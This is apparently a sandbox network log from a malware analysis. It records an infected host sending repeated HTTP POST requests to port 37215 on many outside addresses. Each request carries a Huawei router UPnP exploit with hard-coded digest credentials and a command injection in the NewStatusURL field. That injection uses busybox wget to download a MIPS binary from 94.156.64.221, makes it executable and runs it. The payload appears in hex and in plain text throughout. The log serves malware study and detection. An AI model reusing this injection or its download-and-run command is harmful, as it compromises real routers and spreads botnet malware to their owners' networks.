74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    280192.168.2.2357296197.132.75.18637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255506992 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    281192.168.2.2339538197.75.33.11237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255551100 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    282192.168.2.235714241.39.148.20637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255666971 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    283192.168.2.2351746156.110.247.23337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255707026 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    284192.168.2.2345840156.152.96.20437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255789042 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    285192.168.2.2344038156.42.21.6237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255840063 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    286192.168.2.2344130156.151.10.7737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255877018 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    287192.168.2.2354086156.123.221.18537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255917072 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    288192.168.2.2342316156.170.125.22237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255942106 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    289192.168.2.2341036156.69.248.10537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255975962 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    290192.168.2.2334408197.214.96.21337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256025076 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
